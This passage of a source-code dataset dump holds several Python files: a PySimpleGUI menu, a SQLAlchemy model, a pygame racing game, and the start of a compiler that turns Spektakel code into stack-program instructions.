[sg.Button('Generador de Memes',key=\"-mem-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Collage',key=\"-collage-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Etiquetar Imágenes',key=\"-img-\",size=(25,1))], \n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Salir',pad=(90,2))]\n ]\n barra_layout =[sg.Column(\n [\n [sg.Button(image_data=data, enable_events=True, image_subsample=2, border_width=0, button_color=\"Tan\", key=\"-actualizar-\")],\n [sg.Text(\" \"+nickname[0], font=(\"Black\",11), background_color=\"Tan\")]\n ],\n element_justification=\"left\",\n justification=\"left\",\n background_color=\"Tan\"\n ),sg.Push(\"Tan\"),\n sg.Column(\n [[ \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"configuracion.png\")),button_color=\"Tan\",key=\"config\",border_width=0), \n \n sg.Image(background_color=\"tan\",size=(5,5)),\n \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"ayuda.png\")),button_color=\"Tan\", border_width=0,key='help'), \n ]])\n ]\n\n \n layout = [[\n barra_layout,\n sg.Column(menu,background_color=\"Tan\",)]\n ]\n \n window = sg.Window(\"Menú Principal\", layout,finalize=True,resizable=True,element_justification=\"Center\")\n window.set_min_size((500,500))\n window.BackgroundColor=(\"Tan\")\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"direcciones.txt\"))\n try:\n lectura=open(directorio_direcciones,\"r\")\n except FileNotFoundError:\n escritura=open(directorio_direcciones,\"w\")\n escritura.write (directorio_imagenes+\"@\"+directorio_imagenes+\"@\"+directorio_imagenes)\n escritura.close()\n lectura=open(directorio_direcciones,\"r\")\n lista=lectura.readline()\n lista=lista.split(\"@\")\n for e in lista:\n dir_im=lista[0]\n dir_coll=lista[1]\n dir_mem=lista[2]\n lectura.close()\n \n while True:\n event, values = window.read()\n \n if event in (sg.WIN_CLOSED, 'Salir'):\n break\n elif event == ('help'):\n 
ayuda.crearVentana()\n elif event==\"-actualizar-\":\n dicc={}\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"..\",\"perfiles.json\"))\n archivo=open(directorio_direcciones,\"r\") \n dicc=json.load(archivo)\n archivo.close()\n lista=act.CrearVentana(datos,nickname)\n print(lista)\n datos=lista\n dicc[nickname[0]]=lista\n archivo= open(directorio_direcciones,\"w\")\n json.dump(dicc,archivo)\n archivo.close()\n window[\"-actualizar-\"].update(image_data=MostrarImagen(dicc[nickname[0]][3]))\n elif event == 'config':\n confg.CrearVentana()\n elif event == '-mem-':\n meme.crearVentana()\n elif event == \"-collage-\":\n img.crearVentana()\n elif event==\"-img-\":\n etiquetar.crearVentana(dir_im,nickname)\n window.close()\n \n", "repo_name": "Valenturco/python_proyecto", "sub_path": "grupo36-main-unlpimage/unlpimage/ventanas/Menu_Principal.py", "file_name": "Menu_Principal.py", "file_ext": "py", "file_size_in_byte": 4934, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 15, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 23, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 23, "usage_type": "name"}, {"api_name": "PIL.ImageOps.fit", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 25, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 42, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 43, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 44, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 45, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 46, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 48, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 54, "usage_type": "call"}, {"api_name": "PySimpleGUI.Push", "line_number": 59, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 62, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 64, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "PySimpleGUI.WIN_CLOSED", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ventanas.Ayuda.crearVentana", "line_number": 102, "usage_type": "call"}, {"api_name": "ventanas.Ayuda", "line_number": 102, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "json.load", "line_number": 108, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil.CrearVentana", "line_number": 110, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 115, "usage_type": "call"}, {"api_name": "ventanas.configuracion.CrearVentana", "line_number": 119, "usage_type": "call"}, {"api_name": "ventanas.configuracion", "line_number": 119, "usage_type": "name"}, {"api_name": "ventanas.interfaz_meme.crearVentana", "line_number": 121, "usage_type": "call"}, {"api_name": "ventanas.interfaz_meme", "line_number": 121, "usage_type": "name"}, {"api_name": "ventanas.GeneradorImagen.crearVentana", "line_number": 123, "usage_type": "call"}, {"api_name": "ventanas.GeneradorImagen", "line_number": 123, "usage_type": "name"}, {"api_name": "ventanas.EtiquetarImagenes.crearVentana", "line_number": 125, "usage_type": "call"}, {"api_name": "ventanas.EtiquetarImagenes", "line_number": 125, "usage_type": "name"}]}
+{"seq_id": "3221566909", "text": "from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom sqlalchemy.types import PickleType\n\nBase = declarative_base()\n\nclass DBExcerpts(Base):\n __tablename__ = 'excerpts'\n\n excerpt_id = Column(String(100), \n primary_key=True,\n nullable=False, \n unique=True)\n excerpt_processed = Column(String(10005),\n nullable=False)\n city = Column(String(50), \n nullable=False)\n state = Column(String(2),\n nullable=False)\n excerpt_vector = Column(String(10),#PickleType\n nullable=False)\n source_date = Column(Date, \n nullable=False)\n\n# def __repr__(self):\n# return f\"Excerpt: {self.excerpt_processed} - Date: {self.source_date} - City: {self.state} - State: {self.city} - Vector: {self.excerpt_vector}\"\n\n", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "api/querido_diario/db/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 5, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Date", "line_number": 22, "usage_type": "argument"}]}
+{"seq_id": "14432026174", "text": "#Imports\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nimport random, time\r\n\r\n#Initialzing the pygame\r\npygame.init()\r\n\r\n#Setting up FPS \r\nFPS = 60\r\nFramePerSec = pygame.time.Clock()\r\n\r\n#Creating colors\r\nBLUE = (0, 0, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\n\r\n#Other Variables for use in the program\r\nSCREEN_WIDTH = 400\r\nSCREEN_HEIGHT = 600\r\nSPEED = 5\r\nSCORE = 0\r\n\r\n#Setting up Fonts\r\nfont = pygame.font.SysFont(\"Verdana\", 60)\r\nfont_small = pygame.font.SysFont(\"Verdana\", 20)\r\ngame_over = font.render(\"Game Over\", True, BLACK)\r\n\r\nbackground = pygame.image.load(\"AnimatedStreet.png\") # loading a backgroud\r\n\r\n#Create a white screen \r\nDISPLAYSURF = pygame.display.set_mode((400,600))\r\nDISPLAYSURF.fill(WHITE)\r\npygame.display.set_caption(\"Game\")\r\n\r\n# Create a Coin class \r\nclass Coin(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n self.image = pygame.Surface((50,50)) # create a surface\r\n self.image.fill((255,232,0)) # Fill to the yellow color \r\n self.rect = self.image.get_rect() # convert to self rect\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-50) #Generate random position for x value\r\n def move(self):\r\n self.rect.y += 5 # moving with speed 5\r\n # if we do not collide with player then again generate on the top \r\n if self.rect.y > SCREEN_HEIGHT:\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-10)\r\n\r\n# create an Enemy class\r\nclass Enemy(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Enemy.png\")\r\n self.rect = self.image.get_rect() # creating a rect object\r\n self.rect.center = (random.randint(40,SCREEN_WIDTH-40), 0) # creating a random position\r\n\r\n def move(self):\r\n global SCORE\r\n self.rect.move_ip(0,SPEED) # move_ip it is the rectangle function which help to change the position\r\n if (self.rect.bottom > 600):\r\n SCORE += 1 # if we do not collide with player , then + 1 point to the score \r\n self.rect.top = 0\r\n self.rect.center = (random.randint(40, SCREEN_WIDTH - 40), 0)\r\n\r\n# PLayer class\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Player.png\")\r\n self.rect = self.image.get_rect() # create a rect object \r\n self.rect.center = (160, 520) # set the center \r\n \r\n def move(self):\r\n pressed_keys = pygame.key.get_pressed()\r\n # moving PLayer object to the right or to the left \r\n if self.rect.left > 0:\r\n if pressed_keys[K_LEFT]:\r\n self.rect.move_ip(-5, 0)\r\n if self.rect.right < SCREEN_WIDTH: \r\n if pressed_keys[K_RIGHT]:\r\n self.rect.move_ip(5, 0)\r\n \r\n\r\n#Setting up Sprites \r\nP1 = Player()\r\nE1 = Enemy()\r\nC1 = Coin()\r\n\r\n#Creating Sprites Groups\r\npoints = pygame.sprite.Group()\r\nenemies = pygame.sprite.Group()\r\nenemies.add(E1)\r\npoints.add(C1)\r\nall_sprites = pygame.sprite.Group()\r\nall_sprites.add(P1)\r\nall_sprites.add(E1)\r\nall_sprites.add(C1)\r\n\r\n#Adding a new User event \r\nINC_SPEED = pygame.USEREVENT + 1\r\npygame.time.set_timer(INC_SPEED, 1000) # each time after 1 second will appear this event\r\n# creating a score to the points \r\ncnt = 0 \r\n#Game Loop\r\npygame.mixer.music.load('background.wav')\r\npygame.mixer.music.play(0)\r\nwhile True:\r\n \r\n #Cycles through all events occuring \r\n for event in pygame.event.get():\r\n # OUR-EVENT 
\r\n if event.type == INC_SPEED:\r\n SPEED += 0.5 \r\n # SIMPLE-EVENT \r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # blitting our background to the surface \r\n DISPLAYSURF.blit(background, (0,0))\r\n #creating surfaces\r\n scores = font_small.render(str(SCORE), True, BLACK)\r\n earnpoints = font_small.render(str(cnt),True,BLACK)\r\n # blitting the surfaces\r\n DISPLAYSURF.blit(scores, (10,10))\r\n DISPLAYSURF.blit(earnpoints,(300,10))\r\n #Moves and Re-draws all Sprites\r\n for entity in all_sprites:\r\n entity.move()\r\n DISPLAYSURF.blit(entity.image, entity.rect)\r\n \r\n \r\n\r\n #To be run if collision occurs between Player and COIN\r\n if pygame.sprite.spritecollide(P1,points,True):\r\n cnt += 1 # increase the coin count \r\n print(cnt)\r\n C1 = Coin() # creating a new Coin sprite \r\n # adding our Sprite to the Group \r\n points.add(C1)\r\n all_sprites.add(C1)\r\n\r\n #To be run if collision occurs between Player and Enemy\r\n\r\n if pygame.sprite.spritecollideany(P1, enemies):\r\n pygame.mixer.music.stop() # stop the background music \r\n pygame.mixer.Sound('crash.wav').play() # play the crash sound \r\n time.sleep(1)\r\n \r\n DISPLAYSURF.fill(RED) # fill the screen with red \r\n # blitting surface\r\n DISPLAYSURF.blit(game_over, (30,250))\r\n \r\n pygame.display.update() # update the display\r\n for entity in all_sprites:\r\n entity.kill() # killing the sprite objects \r\n time.sleep(2)\r\n pygame.quit() # quit pygame \r\n sys.exit() # exit from Python\r\n \r\n pygame.display.update()\r\n FramePerSec.tick(FPS)\r\n", "repo_name": "Murapov11/Python", "sub_path": "LAB8/racer.py", "file_name": "racer.py", "file_ext": "py", "file_size_in_byte": 5433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 58, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 71, "usage_type": 
"attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.USEREVENT", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 140, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 152, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 153, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 159, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 163, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 166, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 166, "usage_type": "attribute"}]}
+{"seq_id": "69991539050", "text": "import io\nfrom collections import namedtuple\n\nfrom engine.functional import terms\nfrom engine.functional.reference import ReturnValueReference, ExceptionReference, NameReference, FrameReference, \\\n AbsoluteFrameReference\nfrom engine.functional.terms import ComparisonOperator, BooleanBinaryOperator, TRef, UnaryOperator, Read, NewDict, \\\n NewProcedure, CTerm, Lookup, CString\nfrom engine.functional.values import VReturnError, VBreakError, VContinueError, VDict, VProcedure\nfrom engine.tasks.instructions import Push, Pop, Launch, Update, Guard, StackProgram, ProgramLocation\nfrom lang.translator import Translator\nfrom util import check_type\nfrom .ast import Pass, Constant, Identifier, Attribute, Tuple, Projection, Call, Launch, Await, Comparison, \\\n BooleanBinaryOperation, UnaryOperation, ArithmeticBinaryOperation, ImportNames, ImportSource, \\\n ExpressionStatement, Assignment, Block, Return, Raise, Break, \\\n Continue, Conditional, While, For, Try, VariableDeclaration, ProcedureDefinition, \\\n PropertyDefinition, ClassDefinition, AssignableExpression\nfrom ..modules import ModuleSpecification\n\n\ndef negate(bexp):\n return terms.UnaryOperation(UnaryOperator.NOT, bexp)\n\n\nclass Chain:\n \"\"\"\n Represents a sequence of instructions. Control flow can enter this chain only at its start.\n \"\"\"\n def __init__(self):\n self._proto = []\n self._targets = set()\n self._can_continue = True\n\n def __hash__(self):\n return hash(tuple(t for t, *_ in self._proto))\n\n def _equals(self, other, bijection=None):\n if bijection is None:\n bijection = {}\n if not (self._can_continue == other._can_continue and len(self._proto) == len(other._proto)):\n return False\n try:\n return bijection[self] is other\n except KeyError:\n bijection[self] = other\n for (t1, *args1), (t2, *args2) in zip(self._proto, other._proto):\n if t1 is not t2:\n return False\n for a1, a2 in zip(args1, args2):\n if isinstance(a1, Chain):\n if not a1._equals(a2, bijection=bijection):\n return False\n elif isinstance(a1, list):\n assert t1 is Update\n if tuple(a1) != tuple(a2):\n return False\n elif isinstance(a1, dict):\n assert t1 is Guard\n if len(a1) != len(a2):\n return False\n for k, v in a1.items():\n try:\n if v != a2[k]:\n return False\n except KeyError:\n return False\n else:\n if not a1 == a2:\n return False\n return False\n\n def __eq__(self, other):\n return isinstance(other, Chain) and self._equals(other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __add__(self, other):\n if not isinstance(other, Chain):\n raise TypeError(\"Chains can only be extended by other chains!\")\n self._assert_continuable()\n s = Chain()\n s._proto = self._proto + other._proto\n s._targets = self._targets | other._targets\n s._can_continue = other._can_continue\n return s\n\n def __str__(self):\n t2s = {Update: \"Update\", Guard: \"Guard\", Push: \"Push\", Pop: \"Pop\", Launch: \"Launch\"}\n newline = \"\"\n with io.StringIO() as s:\n for t, *args in self._proto:\n s.write(newline)\n newline = \"\\n\"\n s.write(t2s[t])\n prefix = \": \"\n for a in args:\n s.write(prefix)\n s.write(str(a))\n prefix = \", \"\n return s.getvalue()\n\n def __len__(self):\n return len(self._proto)\n\n def _assert_continuable(self):\n if self._proto is None:\n raise RuntimeError(\"This chain has been finalized and cannot be modified anymore!\")\n if not self._can_continue:\n raise RuntimeError(\"This chain cannot be extended, because of the type of its last instruction!\")\n\n def 
append_update(self, ref, expression, on_error):\n \"\"\"\n Appends a prototype of an update instruction to this chain.\n :param ref: An Expression specifying which part of the state is to be updated.\n :param expression: The Expression object specifying how to compute the new value.\n :param on_error: The chain to jump to if the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Update, ref, expression, on_error))\n self._targets.add(on_error)\n\n def append_guard(self, alternatives, on_error):\n \"\"\"\n Appends a prototype of a guard instruction to this chain. The chain cannot be continued after a guard\n instruction.\n :param alternatives: A mapping from Expressions to Chains, specifying to which chain to jump under which\n condition.\n :param on_error: The chain to jump to in case the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Guard, alternatives, on_error))\n for _, t in alternatives.items():\n self._targets.add(t)\n self._targets.add(on_error)\n self._can_continue = False\n\n def append_jump(self, target):\n \"\"\"\n Appends a prototype of an unconditional jump instruction to this chain.\n The chain cannot be continued after this.\n :param target: The chain to jump to.\n \"\"\"\n # According to the semantics, there cannot be an error in evaluating Truth():\n self.append_guard({terms.CBool(True): target}, None)\n\n def append_push(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Push instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Push, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def append_pop(self):\n \"\"\"\n Appends a prototype of a Pop instruction to this chain.\n The chain cannot be continued after a pop instruction.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Pop, ))\n self._can_continue = False\n\n def append_launch(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Launch instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! 
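# As append_jump above shows, this instruction set has no dedicated
# unconditional jump: a jump is just a Guard whose single alternative is
# guarded by the constant True. A rough illustration of that encoding with
# plain Python data; run_guards and the offset-based program layout are
# assumptions of this sketch, not engine API:

def run_guards(program, pc=0, steps=10):
    trace = [pc]
    for _ in range(steps):
        alternatives = program[pc]
        for condition, target in alternatives.items():
            if condition:              # a guard on True == unconditional jump
                pc = target
                break
        else:
            break                      # no alternative fired: execution halts
        trace.append(pc)
        if pc == len(program) - 1:
            break
    return trace

# Offset 0 jumps unconditionally to 2; offset 2 branches on a real condition:
prog = [{True: 2}, {True: 3}, {1 < 2: 1}, {}]
print(run_guards(prog))  # [0, 2, 1, 3]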
To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Launch, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def compile(self):\n \"\"\"\n Compiles this chain and the chains it may jump to into a StackProgram.\n :return: A StackProgram object.\n \"\"\"\n\n offset = 0\n entries = {}\n chains = [self]\n\n while len(chains) > 0:\n c = chains.pop()\n if c in entries:\n continue\n entries[c] = offset\n offset += len(c)\n chains.extend((t for t in c._targets if t is not None))\n\n instructions = []\n offset = 0\n\n for c in entries.keys(): # Enumerates the chains in the order they were inserted, guaranteeing that they start\n # exactly at the recorded offsets.\n for t, *args in c._proto:\n\n if t is Pop:\n instructions.append(Pop())\n\n else:\n *args, on_error = args\n if on_error is None:\n on_error = -1\n else:\n on_error = entries[on_error]\n\n if t is Update:\n ref, expression = args\n instructions.append(Update(ref, expression, offset + 1, on_error))\n elif t is Guard:\n alternatives, = args\n instructions.append(Guard({condition: entries[chain] for condition, chain in alternatives.items()}, on_error))\n elif t is Push:\n entry, expressions = args\n instructions.append(Push(entry, expressions, offset + 1, on_error))\n elif t is Launch:\n entry, expressions = args\n instructions.append(Launch(entry, expressions, offset + 1, on_error))\n else:\n raise NotImplementedError(\"Bug in Chain.compile: The instruction type {} \"\n \"has not been taken into account for compilation yet!\".format(t))\n offset += 1\n\n if c._can_continue:\n instructions.append(Guard({}, offset))\n offset += 1\n\n return StackProgram(instructions)\n\n\nclass BlockStack:\n \"\"\"\n Models a stack to which information about syntactic blocks can be pushed during code generation.\n \"\"\"\n\n LoopBlock = namedtuple(\"LoopBlock\", (\"headChain\", \"successorChain\"))\n ExceptionBlock = namedtuple(\"ExceptionBlock\", (\"exceptionReference\", \"finallyChain\"))\n FunctionBlock = namedtuple(\"FunctionBlock\", (\"offset\", ))\n ClassBlock = namedtuple(\"ClassBlock\", (\"offset\", ))\n ModuleBlock = namedtuple(\"ModuleBlock\", (\"offset\", ))\n\n def __init__(self):\n super().__init__()\n self._entries = []\n\n def push(self, entry):\n \"\"\"\n Pushes an entry to the top of the stack.\n :param entry: The entry to push.\n \"\"\"\n self._entries.append(entry)\n\n def pop(self):\n \"\"\"\n Removes the latest entry from the stack.\n :return: The entry that was popped.\n \"\"\"\n return self._entries.pop()\n\n @property\n def top(self):\n \"\"\"\n The entry on the top of the stack.\n \"\"\"\n return self._entries[-1]\n\n def __getitem__(self, idx):\n return self._entries[idx]\n\n def __setitem__(self, key, value):\n self._entries[key] = value\n\n def __iter__(self):\n return reversed(self._entries)\n\n def __len__(self):\n return len(self._entries)\n\n\nclass Spektakel2Stack(Translator):\n \"\"\"\n A translator that translates Spektakel AST nodes into stack programs.\n \"\"\"\n\n def __init__(self, builtin):\n \"\"\"\n Initializes a new translator.\n :param builtin: An iterable of BuiltinModuleSpecification objects that define identifiers that are to be\n builtin, i.e. 
valid without any explicit definition or import.\n        \"\"\"\n        super().__init__()\n        self._decl2ref = {} # Maps declaration nodes to references.\n        self._blocks = BlockStack()\n        self._import_procedure = None\n        self._builtin = list(builtin)\n\n    def declare_name(self, chain, name, on_error):\n        \"\"\"\n        Statically declares a new variable name. Depending on the context the name will be declared as a stack frame\n        variable, or as a namespace entry. The new variable is recorded for the given declaration, such that it can\n        easily be retrieved later.\n        :param chain: The Chain to which the instructions for allocating the new variable should be appended.\n        :param on_error: The Chain to which control should be transferred if the allocation code fails.\n        :param name: Either an AST node, or a string, under which the reference generated by this call can be retrieved\n        later. It may be None, in which case an anonymous local variable is allocated on the stack.\n        :return: A Reference object that represents the newly allocated variable.\n        \"\"\"\n\n        blocks_iter = iter(self._blocks)\n\n        try:\n            idx, top = 0, next(blocks_iter)\n        except StopIteration:\n            raise Exception(\"Bug in declare_name!\")\n\n        if name is None:\n            pass\n        elif isinstance(name, str):\n            